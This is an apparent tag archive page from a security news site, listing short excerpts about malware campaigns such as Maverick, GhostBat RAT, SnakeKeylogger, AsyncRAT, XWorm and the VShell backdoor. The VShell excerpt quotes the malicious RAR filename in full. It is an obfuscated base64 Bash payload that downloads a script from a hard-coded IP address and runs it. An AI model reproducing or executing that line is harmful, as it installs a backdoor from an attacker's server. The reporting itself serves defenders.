Tag: infection
-
New Banking Malware Exploits WhatsApp to Hijack Your Computer Remotely
Cybersecurity researchers have uncovered a sophisticated malware campaign targeting Brazilian users through WhatsApp, delivering a dangerous new banking Trojan dubbed >>Maverick.
-
GhostBat RAT Android Malware Poses as Fake RTO Apps to Steal Banking Data from Indian Users
The GhostBat RAT campaign leverages diverse infection vectors (WhatsApp, SMS with shortened URLs, GitHub-hosted APKs, and compromised websites) to distribute malicious Android droppers. Once installed, these droppers employ multi-stage workflows, deliberate ZIP header manipulation, and heavy string obfuscation to evade antivirus detection and reverse engineering. The threat actors utilize native libraries (.so) to dynamically resolve API…
-
UEFI Shell Flaws Let Hackers Disable Secure Boot on Over 200,000 Laptops
Security researchers have uncovered critical vulnerabilities in signed UEFI shells that allow attackers to completely bypass Secure Boot protections on approximately 200,000 Framework laptops and desktops. These flaws expose a fundamental weakness in firmware security that could enable persistent, undetectable malware infections at the most privileged system level. The vulnerabilities center around legitimate diagnostic tools…
-
Risks of Not Aligning with ISO 27001 Remote Access Policy
28% of organizations have become a part of some gruesome cybersecurity incidents, according to a security report released by IBM in 2024. Among the attack vectors of such attacks were malware infections, phishing scams, and unintentional data leaks. To the rescue comes ISO 27001. It provides a framework that helps organizations like yours fight back…
-
Snake Keylogger Uses Weaponized Emails and PowerShell to Steal Sensitive Data
A newly observed information-stealing campaign is deploying a stealthy variant of the SnakeKeylogger malware via weaponized e-mails that masquerade as legitimate remittance advice from CPA Global and Clarivate. Researchers first identified the infection vector on October 7, 2025, when recipients received messages titled “remittance advice for the payment dated 07-Oct-2025,” urging them to download an…
-
Chinese Cybercrime Group Runs Global SEO Fraud Ring Using Compromised IIS Servers
Tags: attack, china, credentials, cybercrime, cybersecurity, fraud, group, india, infection, Internet, microsoft, service, theft
Cybersecurity researchers have shed light on a Chinese-speaking cybercrime group codenamed UAT-8099 that has been attributed to search engine optimization (SEO) fraud and theft of high-value credentials, configuration files, and certificate data. The attacks are designed to target Microsoft Internet Information Services (IIS) servers, with most of the infections reported in India, Thailand First seen…
-
WhatsApp Exploited to Spread SORVEPOTEL Malware on Windows Systems
An aggressive malware campaign dubbed SORVEPOTEL is exploiting WhatsApp messages to infiltrate Windows systems, with its epicenter in Brazil. Rather than pursuing data theft or ransomware extortion, this self-propagating malware is engineered for rapid spread, leveraging social trust and automation to reach new victims. Trend Research telemetry shows that 457 of the 477 detected infections…
-
Industrial Automation Threats Decline Slightly in Q2 2025, but Risks Remain
ICS malware infections fell in Q2 2025, but phishing and evolving threats keep OT environments at risk.
First seen on esecurityplanet.com. Jump to article: www.esecurityplanet.com/threats/industrial-automation-threats-decline-slightly-in-q2-2025-but-risks-remain/
-
The Industry’s Passkey Pivot Ignores a Deeper Threat: Device-Level Infections
Passkeys Are Progress, But They’re Not Protection Against Everything. The cybersecurity community is embracing passkeys as a long-overdue replacement for passwords. These cryptographic credentials, bound to a user’s device, eliminate phishing and prevent credential reuse. Major players, like Google, Apple, Microsoft, GitHub, and Okta, have made passkey login widely available across consumer and enterprise services…
-
Hackers Exploit AdaptixC2, an Emerging Open-Source C2 Tool
In early May 2025, Unit 42 researchers observed that AdaptixC2 was used to infect several systems. While many C2 frameworks garner public attention, AdaptixC2 has remained largely under the radar until Unit 42 documented its deployment by real-world threat actors. This article examines AdaptixC2’s capabilities, recent infection scenarios, and guidance for defenders to anticipate and…
-
Windows Users Hit by VenomRAT in AI-Driven RevengeHotels Attack
RevengeHotels, also known as TA558, has escalated its long-standing cybercrime campaign by incorporating artificial intelligence into its infection chains, deploying the potent VenomRAT malware against Windows users. Active since 2015, this threat actor has traditionally targeted hotel guests and travelers, stealing payment card data through phishing emails. Recent campaigns, however, demonstrate a marked shift: AI-generated…
-
APT28 Exploits Signal Messenger to Deploy BeardShell and Covenant Malware
Sekoia.io’s Threat Detection and Response (TDR) team has uncovered a sophisticated campaign by APT28 that weaponizes Signal Messenger to deploy two previously undocumented malware families: BeardShell and the Covenant framework. In early 2025, a trusted partner supplied samples that did not match any known infection chain, prompting a joint investigation. On 21 June 2025, CERT-UA…
-
Stealthy AsyncRAT flees the disk for a fileless infection
Tags: access, best-practice, control, credentials, infection, malicious, malware, monitoring, phishing, powershell, rat, theft, threat, update, windows
RAT with evasion and persistence: Once AsyncRAT was loaded, the attackers took steps to disrupt Windows defenses. The report notes techniques such as disabling Anti-malware Scan Interface (AMSI) and tampering with Event Tracing for Windows (ETW), both critical features for runtime detection. To maintain persistence, they created a scheduled task disguised as “Skype Update,” ensuring…
-
New Malware Exploits Exposed Docker APIs to Gain Persistent Root SSH Access
The Akamai Hunt Team has uncovered a new strain of malware that targets exposed Docker APIs with expanded infection capabilities. First observed in August 2025 within Akamai’s honeypot infrastructure, this variant diverges from the June 2025 Trend Micro report by blocking other attackers from accessing the Docker API and delivering a modular payload rather than…
-
XWorm Malware Adopts New Infection Chain to Bypass Security Detection
Cybersecurity researchers have identified a sophisticated evolution in XWorm malware operations, with the backdoor campaign implementing advanced tactics to evade detection systems. The Trellix Advanced Research Center has documented this significant shift in the malware’s deployment strategy, revealing a deliberate move toward more deceptive and intricate infection methods designed to increase success rates while remaining…
-
Mapping the Web of Commercial Spyware: Targets and Attack Chains
A comprehensive new report spanning 2010 to 2025 reveals the ever-evolving landscape of commercial spyware vendors (CSVs), exposing the methods these private firms employ to infiltrate devices, their typical targets, and the infection chains that deliver their covert implants. The study, produced by a leading cybersecurity intelligence firm, underscores the persistent threat posed by CSVs…
-
Abandoned Sogou Zhuyin Update Server Hijacked, Weaponized in Taiwan Espionage Campaign
An abandoned update server associated with input method editor (IME) software Sogou Zhuyin was leveraged by threat actors as part of an espionage campaign to deliver several malware families, including C6DOOR and GTELAM, in attacks primarily targeting users across Eastern Asia. “Attackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or…
-
Malicious apps with 19M+ installs removed from Google Play for spreading Anatsa banking trojan and other malware
Experts found 77 malicious Android apps with 19M+ installs on Google Play, spreading malware, including the Anatsa (TeaBot) banking trojan. While investigating Anatsa (TeaBot) banking trojan infections, Zscaler’s ThreatLabs discovered seventy-seven malicious Android apps with more than 19 million installs. Several Anatsa decoy apps have each been downloaded more than 50,000 times. The malicious apps…
-
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell. The “Linux-specific malware infection chain starts with a spam email with a malicious RAR archive file,” Trellix researcher Sagar Bade said in a technical write-up. “The payload isn’t hidden inside the file content or a…
-
Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems
Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash. The…
-
UNC5518 Group Hacks Legitimate Sites with Fake Captcha to Deliver Malware
The financially motivated threat group UNC5518 has been infiltrating trustworthy websites to install ClickFix lures (misleading phony CAPTCHA pages) as part of a complex cyber campaign that has been monitored since June 2024. These malicious pages trick users into executing downloader scripts that initiate infection chains, often leading to malware deployment by affiliated…